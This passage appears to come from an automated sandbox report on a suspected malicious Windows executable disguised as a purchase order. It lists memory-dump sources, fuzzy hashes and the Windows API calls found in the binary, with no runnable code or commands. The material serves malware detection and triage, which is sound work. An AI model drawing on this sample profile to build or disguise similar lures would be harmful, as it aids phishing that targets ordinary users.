                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 2483343779-2107944366
                                                    • Opcode ID: e86c144bec5737ca2d4e246b1ffe3b51c51e8625c1c36adbe63ff8434ef78569
                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                    • Opcode Fuzzy Hash: e86c144bec5737ca2d4e246b1ffe3b51c51e8625c1c36adbe63ff8434ef78569
                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                    • _wcslen.LIBCMT ref: 00450720
                                                    • _wcscat.LIBCMT ref: 00450733
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                    • String ID: -----$SysListView32
                                                    • API String ID: 4008455318-3975388722
                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                    • GetParent.USER32 ref: 00469C98
                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                    • GetParent.USER32 ref: 00469CBC
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2360848162-1403004172
                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                    • String ID:
                                                    • API String ID: 262282135-0
                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 0-1603158881
                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                    • String ID: close all$v
                                                    • API String ID: 4174999648-2732915201
                                                    • Opcode ID: d7ac3104d7ae6fac27feef706535c76765a07ff2df80d75d47316df83ad5e488
                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                    • Opcode Fuzzy Hash: d7ac3104d7ae6fac27feef706535c76765a07ff2df80d75d47316df83ad5e488
                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                    APIs
                                                    • CreateMenu.USER32 ref: 00448603
                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                    • IsMenu.USER32(?), ref: 004486AB
                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0
                                                    • API String ID: 161812096-4108050209
                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe), ref: 00434057
                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                    • _wprintf.LIBCMT ref: 004340A1
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                    Strings
                                                    • C:\Users\user\Desktop\[Purchase Order] PO2411024.exe, xrefs: 00434040
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                    • API String ID: 3648134473-1176240900
                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11bd2db876abdd3147ba8f11862e6029a27331dada380e85bce232463f41c27f
                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                    • Opcode Fuzzy Hash: 11bd2db876abdd3147ba8f11862e6029a27331dada380e85bce232463f41c27f
                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                    APIs
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,0040F545,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,004A90E8,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                    • String ID:
                                                    • API String ID: 978794511-0
                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
